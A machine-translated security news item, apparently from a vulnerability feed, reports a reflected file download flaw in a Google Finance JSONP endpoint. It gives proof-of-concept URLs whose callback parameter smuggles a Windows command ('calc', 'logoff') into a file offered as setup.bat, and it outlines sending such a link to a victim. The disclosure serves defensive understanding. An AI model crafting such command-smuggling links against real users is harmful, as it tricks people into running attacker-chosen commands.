Google Finance was traced to reflected File Download(RFD)vulnerabilities-vulnerability warning-the black bar safety net

2016-01-26T00:00:00
ID MYHACK58:62201671413
Type myhack58
Reporter 佚名
Modified 2016-01-26T00:00:00

Description

! A Portuguese network security expert David Sopas found the impact of Google Finance a reflected File Download(RFD)vulnerabilities. I'm in audits of other clients time to discover this vulnerability, through RFD, you need to establish a page to force the download. This Google JSON file of the request has been for us to do. Found vulnerability I found this request: http://www.google.com/finance/info?q=ELI:ALTR&callback=? Will return the following information: // [ { "id": "7 0 3 6 5 5" ,"t" : "ALTR" ,"e" : "ELI" "l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 1 5, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:3 5:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] Then I was curious, the callback parameter can not be forged yet. So I just request to join the“calc” of: http://www.google.com/finance/info?q=ELI:ALTR&callback=calc Then the information returned is as follows: // calc([ { "id": "7 0 3 6 5 5" ,"t" : "ALTR" ,"e" : "ELI" "l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 1 5, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:3 5:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] ); Tall! I put the Windows command is injected into XHR request. We take a look at this URL may not be possible: http://www.google.com/finance/info;setup. bat? q=ELI:ALTR&callback=calc Then I received the automatic pop-up batch files the download window the URL. I tried a bit of these browsers, and found that both are possible: Firefox latest version Opera latest version Internet Explorer 8 and 9 Use restrictions I noticed when testing, most of the characters are filtered, so you can only use one command, no spaces or parameters. PoC: http://www.google.com/finance/info;setup. bat? q=ELI:ALTR&callback=calc [Batch execution will open when the calculator] http://www.google.com/finance/info;setup. bat? q=ELI:ALTR&callback=logoff [Batch execution when windows will logoff] Attack scene: The attacker put the URL sent to the victim: http://www.google.com/finance/info;setup. bat? q=ELI:ALTR&callback=logoff Victims download and execute the file Batch execution after the victim will be written off out of theoperating system Video demo

Google considers this less of a problem, there is no Security Impact, but David Sopas not so think. Currently this RFD vulnerability has not been repaired.